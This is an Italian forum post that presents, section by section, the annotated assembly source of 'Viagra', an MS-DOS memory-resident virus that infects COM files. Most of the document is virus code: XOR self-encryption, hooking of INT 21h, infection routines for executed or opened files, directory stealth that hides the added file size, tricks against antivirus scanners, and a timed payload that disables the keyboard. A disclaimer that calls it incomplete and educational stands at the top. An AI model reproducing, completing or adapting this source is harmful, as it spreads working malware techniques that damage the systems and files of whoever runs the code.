Ecco un esempio di virus. Si chiama VIAGRA ed e' la mia ultima creazione.
Si lo so' che e' vecchiotto ma e' da un bel po' che non scrivo virus per il
semplice motivo che non uso piu' l'MS-DOS ma solo Linux Wink. W Linux !

ATTENZIONE !!! Questi sono solo pezzi del programma originale. Non possono
essere compilati e non sono,quindi, illegali. Essi non possono arrecare
alcun danno. Inoltre il sorgente contiene alcuni errori volutamente
aggiunti per evitare qualsiasi compilazione. Solamente una persona
esperta e motivata puo' essere in grado di assemblare un virus
funzionante.
Diffido chiunque dall'usare questo testo per scopi non educativi.
Nel caso in cui venga compilato ed eseguito non mi riterro' in alcun modo
responsabile per i danni che esso vi causera'. SOLO PER SCOPI DIDATTICI.

[ HEADER DEL VIRUS, INFORMAZIONI VARIE]
; Araknoid virus v0.1 (Viagra Virus)
;
; Written by D.N.A ! 15/12/1998
;
; * Virus Propriety
; þ Infect COM on:
; - Execute
; - Get Attributes
; - Set Attributes
; - Open
; þ Don't infect W*.COM (i.e. WIN.COM)
; þ Don't infect misnamed EXE (i.e. COMMAND.COM)
; þ Memory Invisible Resident
; þ Little Polimorphic Encryption
; þ Directory Stealth
; - Stealth using ah=11h/12h
; - Stealth using ah=4Eh/4Fh
; þ Garbage Instruction to confuse AV
;
; * Effect on Infected System
; þ When Infecting a file a 'V' flash on the top-right corner of screen
; þ RTM executables don't run (bug ?)
; þ On DoS a ball bounch over the screen and system is cut-of Smile
;
; DoS
; Every Monday between 13:00 and 13:59 included, between October and December
; and a random number must be smaller than 3400h Smile
; Keyboard disabled during operation.
; PC must be rebooted.
;
; * Defect
; þ Poor Anti-Debugging routines
; þ Simple and not-well optimized for "secure" reason
; þ Of course there is some bug Wink
;
; * Some Anti-Virus response
; þ F-Prot says that can be a variant of Int78 Virus
; þ NAV 5.0 recognize it as a New Virus
; þ TBAV can't recognize Viagra as a virus (Hehehe)
; þ SCAN from McAffee not mentioned ? Sorry...do u
; really think it's an AntiVirus ?

La prima cosa che devo fare e' conoscere la posizione del virus
all'interno del codice xche tutti i riferimenti ai dati sono assoluti.
Per sapere dove sono faccio una chiamata a CALL get_offs.
L'istruzione CALL pusha in memoria l'IP (per poi recuperarlo con un
eventuale RET). Io prelevo l'IP dallo stack, sotraggo la posizione
relativa del get_offs ed ottengo, in BP (in questo caso) l'offset Wink.

start:
call get_offs
get_offs:
pop bp
sub bp,offset get_offs ; In BP offset

Adesso in BP ho l'offset per tutti i riferimenti ai DATI.
Il secondo pass e' controllare se il virus e' crittato. Per fare
cio' controllo un particolare dato:

; Check if encrypt
lea si,(encrypt_start + bp)
cmp byte ptr cs:[si],90h ; Encrypted ?
je encrypt_start ; Seems to be not Very Happy

Se il corpo e' crittato e' necessario decrittarlo prima che venga
eseguito. La crittazione e' con un semplice XOR a chiave variabile.
Ogni copia del virus ha la sua chiave specifica (Key).
Se non e' crittato, tralascia questa fase.

; Decryption Routine
lea si,(Key + bp)
mov bx,ds:[si] ; BX = Key
lea si,(encrypt_start + bp) ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size of part to decrypt
dec_loop:
mov ax,word ptr ds:[si] ; 16-Bit simple XOR encryption
xor ah,bl
xor al,bh
mov word ptr ds:[si],ax
inc si
inc si
loop dec_loop
encrypt_start:
nop

Adesso devo controllare se il virus e' gia' in residente in memoria. Per
fare cio' utilizzo una particolare chiamata con determinati dati.
Se il virus e' gia' residente controlla se siamo per il DoS (Denial of
Service) ed esegui programma ospite (regole 1 e 2).

mov ax,'VI' ; Controlla se gia' residente
mov bx,'Id' ; Comando di Ident
int 21h
cmp ax,'OK' ; Si,e' residente
jmp install

Adesso controlla se DoS:

; Virus presente nel sistema
; Controlla se momento DoS
mov ah,2Ah ; Get System Date
int 21h
cmp dl,1 ; Monday ?
jne no_more_mem ; Nop...skip...
cmp dh,10 ; October or better ?
jb no_more_mem ; Nop...skip...
mov ah,2Ch ; Get System Time
int 21h
mov ch,13 ; Between 13:00 and 13:59 ?
jne no_more_mem ; Nop...skip...
in ax,40h ; Get Random Number
cmp ax,3400h ; Smaller than .... ?
ja no_more_mem ; Nop...skip...
; Yes ! DoS now !

Si, bisogna eseguire il DoS:

mov ax,'VI' ; Controlla se gia' residente
mov bx,'Do' ; Comando di DoS
int 21h

Se errore oppure gia' installato esegui programma ospite. La tecnica e'
semplice: rimetto a posto il JUMP iniziale e lo eseguo dall'inzio. Siccome
la modifica influenza solo il programma in memoria, il file su disco
rimane inalterato:

no_more_mem:
; Non ci sono speranze di installare, esegui file ospite.
cmp bp,0 ; Ospite presente ?
je no_guest ; Nop,esci.
; Copia JMP originale
lea si,(OrigJMP + bp)
mov di,0100h
mov cx,3 ; 3 Word = 6 Bytes
rep movsw ; Copia
push 0100h ; Alias jmp 0100h Smile
ret

Adesso, siccome il virus non e'installato, devo installarlo in memoria.
Per fare cio'ci sono svariate tecniche: la piu' comune e' allocare un
blocco di memoria alta e marcarlo come di sistema,per essere invisibile ad
un eventuale 'mem':

install:
call mem_install
jmp no_more_mem ; Esci e/o esegui ospite

mem_install:
; ----< THIS code ripped from Dark Angel
mov ah,4Ah ; Allocate Memory
mov bx,0FFFFh ; Ridicolous Size
int 21h
jmp no_more_mem
mov ah,4Ah ; Alter Memory
sub bx,(offset end_virus - offset start + 15)/16+1 ; Subtract Virus size
int 21h
mov ah,48h ; Allocate Memory
mov bx,(offset end_virus - offset start + 15)/16 ; Virus size
int 21h
push ax ; Salva segmento
dec ax
mov es,ax ; ES = Segment of MCB
mov byte ptr es:[0],'Z' ; Last MCB
mov word ptr es:[1],0008h ; DOS Owner of this memory
pop es ; Riprendilo: ES=Segmento del virus

Adesso copia il codice del virus nell'area di memoria per lui allocata:

; Copia virus nella nuova area di memoria ES:DI
mov si,bp ; in SI offset
mov di,0100h
add si,di ; Aggiungi 100h Smile
mov cx,((offset end_virus - offset start)/2)+1 ; Size in WORD del virus
rep movsw ; Copia !
push es
push ds
mov ax,es ; in DS segmento del virus
mov ds,ax ; DS = ES
xor ax,ax
mov es,ax ; ES = AX = 0

Ora devo reindirizzare le chiamate all'interrupt. Invece di usare le
opportune chiamate del MS-DOS preferisco agire al livello piu' basso
possibile, modificando direttamente la memoria:

mov bx,word ptr es:[4*21h+0] ; OffSet
mov ax,word ptr es:[4*21h+2] ; Segmento
mov word ptr ds:[INT21h],bx ; Offset
mov word ptr ds:[INT21h[2]],ax ; Segmento
cli ; Disabilita INT
mov word ptr es:[4*21h+0],offset newint21h ; OffSet
mov word ptr es:[4*21h+2],ds ; Segmento
sti ; Riabilita INT
pop ds
pop es
mov dx,cs
mov es,dx
ret

Se non c'e' un file ospite (xche magari e' il virus originale) esci
tranquillamente.

no_guest:
int 20h
nop

Questo e' il messaggio che il virus deve contenere per poterne
identificare il nome e l'autore. Naturalmente, una volta compilato ed
eseguito, il messaggio e' codificato ed invisibile ad occhio nudo.

Viagra db "[Viagra]",00h,"* Araknoid v0.1 * D.N.A.! ",13,10
db "Hey man, your computer need some Viagra !$"

encrypt_end:
ret
hlt
cli

Word che contiene la chiave di codifica/decodifica

Key dw 0

Questa e'la parte principale e piu' critica del virus. Questa parte di
codice si occupa di infettare e nascondere il virus. Fate attenzione ai
passaggi:

; -=> HANDLER Interrupt 21h

Questa variabile contiene l'offset dell'interrupt 21h originale.

INT21H dd ?

Questo primo pezzo serve per interpretare i comandi:

newint21h proc far
Assume CS:CODE_SEG, DS:Nothing
cmp ax,'VI' ; Virus Command ?
jne check_call
cmp bx,'Id' ; Ident ?
jne No_Id ; Nop
mov ax,'OK' ; Reply OK Smile
No_Id:
cmp bx,'Do' ; DoS ?
jne End_Int ; Nop..exit Interrupt now !
jmp dos ; Yes DoS !
End_Int:
ret 2

Adesso si cerca di identificare la chiamata pervenuta (per la
documentazione relativa vi consiglio le Ralph Brown Interrupt List):

check_call:
cmp ah,4Bh ; Load and Execute ?
je load_execute
cmp ah,11h ; Find First Matching File (Dir Stealth)
je dir_stealth
cmp ah,12h ; Find Next Matching File (Dir Stealth)
je dir_stealth
cmp ax,4300h ; Get File Attributes
je load_execute
cmp ax,4301h ; Set File Attributes
je load_execute
cmp ah,3Dh ; Open File
je load_execute
cmp ah,4Eh ; Find First Matching File (Dir Stealth)
je newdir_stealth
cmp ah,4Fh ; Find First Matching File (Dir Stealth)
je newdir_stealth
jmp do_int_now

Questa e' la procedura di stealth. Il processo e'semplice: ogni volta che
si richiede la lista dei file/directory il virus sa' che ad ogni elemento
della lista corrisponde un potenziale file infetto. Il virus controlla se
e' infetto (Time mark: 62 secondi) e, se lo e', sottrae la dimensione del
virus alla dimensione totale del file cosi' la regola 1 e' soddisfatta e
l'utente poso attento non si accorge di nulla.

dir_stealth:
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now DS:DX point to a valid FCB into DTA
; To stealth i must modify FCB directly there Smile
push ax
push bx
push cx
push dx
push es
cmp al,0FFh ; "No More Matching file"
je not_to_stealth
mov ah,2fh ; Get address to current DTA
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now in ES:BX there is DTA address
cmp word ptr es:[bx+08h],'OC' ; First chech if file is a COM
jne not_to_stealth
mov cx,word ptr es:[bx+16h] ; Check if infected (Sec set to 62)
and cx,1Fh ; Reset all unwanted bit Smile AND 0000000000011111b
cmp cx,1Fh ; Marked ?
jne not_to_stealth ; Nopa,skip over
; Now subtract Virus Size to File Size
mov cx,word ptr es:[bx+1Ch] ; In CX file size
sub cx,(offset end_virus - offset start) ; Subtract it Smile
mov word ptr es:[bx+1Ch],cx ; Replace over
; Finish !
not_to_stealth:
pop es
pop dx
pop cx
pop bx
pop ax
ret 2 ; Return home Smile

Adesso cerca di infettare un file eseguito. Prima di infettare il virus
deve controllare se il file corriponde ai requisiti richiesti: essere un
vero COM e che il nome non inizi per 'W'.

load_execute:
push ax
push bx
push cx
push dx
push es
push ds
push di
push si
call InfectIfCom ; DS:DX nome del file
pop si
pop di
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
do_int_now:
pushf
call INT21H ; Chiama DOS originale
ret 2

Questa e' un'altra procedura stealth per le directory. Siccome ne esiste
una nuova ed una vecchia per sicurezza ho deciso di "stealtharle" tutte e
due Smile.

newdir_stealth:
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now DS:DX point to a valid FCB into DTA
; To stealth i must modify FCB directly there Smile
jnc do_stealth ; All ok ?
ret 2
do_stealth:
pushf
push ax
push bx
push cx
push dx
push es
mov ah,2Fh ; Get address to current DTA
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now in ES:BX there is DTA address
mov cx,word ptr es:[bx+16h] ; Check if infected (Sec set to 62)
and cx,1Fh ; Reset all unwanted bit Smile AND 0000000000011111b
cmp cx,1Fh ; Marked ?
jne newnot_to_stealth ; Nopa,skip over
; Now subtract Virus Size to File Size
mov cx,word ptr es:[bx+1Ah] ; In CX file size
sub cx,(offset end_virus - offset start) ; Subtract it Smile
mov word ptr es:[bx+1Ah],cx ; Replace over
; Finish !
newnot_to_stealth:
pop es
pop dx
pop cx
pop bx
pop ax
popf
ret 2 ; Return home Smile
newint21h endp

Ora infetta un file COM. Fare molta attenzione ai vari passaggi:

; Infect a COM
infect_com:
; ---
push 0B800h
pop es
mov bx,(80-2)*2
mov byte ptr es:[bx],'V'
mov byte ptr es:[bx+1],08h
; --- DO ENCRYPTION -------------------
get_rand:
in ax,40h ; Get Pseudo-Random Number
cmp ax,0
je get_rand
mov word ptr cs:[Key],ax ; Key is into AX
call EncDec ; Encode
; --------------------------------------
; Now we are ready to infect but before do it it's safe to save all attrib.
; and Date's and Time's last modify to prevent suspect Smile
; Variables is also to prevent stack problem.
mov ax,4300h ; Get file attributes
pushf ; INT 21h
call INT21H ; ----^
mov word ptr cs:[FileATTR],ax
mov ax,4301h ; Set File attributes
mov cx,00100000b ; Prevent Read-Only et simila
pushf ; INT 21h
call INT21H ; ----^
mov ah,3dh ; Open File to infect
mov al,00000010b ; Read Write Compatibility Mode
xor cl,cl
pushf ; INT 21h
call INT21H ; ----^
jnc do_read ; All Ok,continue Smile
jmp f_open_err ; If fail, escape now ! Sad
do_read:
push dx ; Salva dati
push ds
mov bx,cs ; BX = CS
mov ds,bx ; DS = BX
xchg bx,ax ; BX = File Handle
call GetTime ; Salva Data e Ora ultima modifica
mov ah,3fh ; Read from file (First 6 Bytes,enought for replace JMP)
mov cx,6 ; 6 Byte (2 Anti-TBAV,3 JMP and 6th is Virus Mark)
lea dx,OrigJMP ; Point to 6-Byte Buffer
pushf ; INT 21h
call INT21H ; ----^
jnc do_check ; All ok,continue Smile
jmp f_common_err ; If error, escape now ! Sad
do_check:
lea si,OrigJMP
cmp word ptr cs:[si],'MZ' ; False COM ?
je f_common_err ; Shit...
cmp word ptr cs:[si],'ZM' ; False COM ?
je f_common_err ; Shit...
add si,5 ; Pointer to 6th element
cmp byte ptr cs:[si],'V' ; Virus Mark Found ?
je f_common_err ; File already infected...mmm...exit !
mov ax,4202h ; Seek to the end of file (to have file size)
xor cx,cx ; 0
xor dx,dx ; 0
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! Sad
mov di,ax ; DI contains File Size
mov ah,40h ; Write to file
mov cx,(offset end_virus - offset start) ; Size of virus
mov dx,0100h ; Write all VIRUS Code Very Happy
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! Sad
mov ax,4200h ; Seek to TOP af file
xor cx,cx ; 0
xor dx,dx ; 0
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! Sad
lea si,TempJMP

Questa e'la parte in cui si sostituisce la prima istruzione del file in un
JMP per eseguire il virus. Attenzione alla tecnica usata per generare il
nuovo JMP:

mov byte ptr cs:[si],24h ; Anti-TBAV Tricks
mov byte ptr cs:[si+1],21h ; --^
mov byte ptr cs:[si+2],0E9h ; JMP Opcode
mov ax,di ; AX = File Size
sub ax,5 ; Sub 5-Byte of JMP
mov byte ptr cs:[si+3],al ; LSB
mov byte ptr cs:[si+4],ah ; MSB
mov byte ptr cs:[si+5],'V' ; Virus Mark
mov ah,40h ; Write to file
mov cx,6 ; 6 Byte
lea dx,TempJMP ; New JMP
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! Sad
call SetTime ; Salva Ultima Modifica e Ora
f_common_err:
mov ah,3eh ; Close file
pushf ; INT 21h
call INT21H ; ----^
pop ds ; Preleva Dati Salvati
pop dx
mov ax,4301h ; Set File Attributes (Restore old ones)
mov cx,word ptr cs:[FileATTR]
pushf ; INT 21h
call INT21H ; ----^
f_open_err:
mov ax,word ptr cs:[Key]
call EncDec ; Decode
; ---
mov bx,(80-2)*2
mov byte ptr es:[bx],' '
mov byte ptr es:[bx+1],0Fh
; ---
ret

Questa e' la procedura di Codifica/Decodifica:

; Key for encode/decode must be stored in AX
EncDec:
mov bx,ax ; BX is Key
lea si,encrypt_start ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size of part to decrypt
enc_loop:
mov ax,word ptr cs:[si] ; 16-Bit simple XOR encryption
xor ah,bl
xor al,bh
mov word ptr cs:[si],ax
add si,2
loop enc_loop
; Now Write Some Garbage Data !
mov cx,10
lea si,dummydata
garb_loop:
in ax,40h
mov word ptr cs:[si],ax
add si,2
loop garb_loop
ret

Queste sono procedure secondarie

GetTime:
mov ax,5700h ; Get File Time and Date
pushf ; INT 21h
call INT21H ; ----^
mov word ptr cs:[FileDATE],dx
mov word ptr cs:[FileTIME],cx
ret

SetTime:
mov ax,5701h ; Set File Time and Date
mov cx,word ptr cs:[FileTIME]
mov dx,word ptr cs:[FileDATE]
or cx,1Fh ; Setta secondi a 64 Smile
pushf ; INT 21h
call INT21H ; ----^
ret

Alcune variabili:

FileATTR dw 0 ; Some Variables
FileDATE dw 0
FileTIME dw 0

Ecco una parte interessante: nelle due variabili seguenti viene
memorizzato il JUMP originale sia del virus che dell'ospite.

TempJMP db 6 DUP(00h) ; Store Temporary New JMP
OrigJMP db 6 DUP(00h) ; Store Original JMP

Questa procedura controlla che il file scelto sia veramente un .COM.
Per prima cosa scanna la stringa alla ricerca dell'ultimo '.' (dot) che
sicuramente equivale all'inizio dell'estensione del file. Allora prende il
precedente '' (backslash) che equivale sicuramente al punto di inizio del
nome.

; Check if file in DS:DX is a .COM
InfectIfCom:
mov si,dx ; SI = DX
xor di,di ; DI = 0
Is_Loop:
cmp byte ptr ds:[si],'.' ; Ext ?
je Is_Ex
cmp byte ptr ds:[si],'' ; Reminder last ''
jne Is_NoD ; Nopa
mov di,si ; DI = Last ''
Is_NoD:
inc si
cmp byte ptr ds:[si],00h ; Fine ?
jne Is_Loop
Is_No:
ret
Is_Ex:
inc di ; Seek on first letter of File Name
cmp byte ptr ds:[di],'W' ; File Name start with 'W' ?
je Is_No ; Yes, don't infect (can be WIN.COM)
inc si
cmp byte ptr ds:[si],'C'
jne Is_No
inc si
cmp byte ptr ds:[si],'O'
jne Is_No
inc si
cmp byte ptr ds:[si],'M'
jne Is_No
jmp infect_com

E questa e'la routine del DoS:

; ----
;
; DoS Routine
posx db 01h
posy db 01h
dirx db 00h
diry db 00h

dos:
; Disable Keyboard input
cli ; Disabilita INT
mov bx,word ptr es:[4*03h+0]
mov dx,word ptr es:[4*03h+2]
mov word ptr es:[4*09h+0],bx ; OffSet
mov word ptr es:[4*09h+2],dx ; Segmento
sti ; Riabilita INT
mov ah,09h ; Display String
lea dx,Viagra
pushf ; INT 21h
call INT21H ; ----^
...


; End of Sign

dummydata db 20 DUP(90h)

end_virus:

CODE_SEG ENDS

END start


Galvo96

Messaggi : 11
Reputazione : 0
Data d'iscrizione : 25.09.10
Età : 21
Località : Boretto

Vedi il profilo dell'utente

Tornare in alto Andare in basso

Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto

- Argomenti simili

 
Permessi di questa sezione del forum:
Non puoi rispondere agli argomenti in questo forum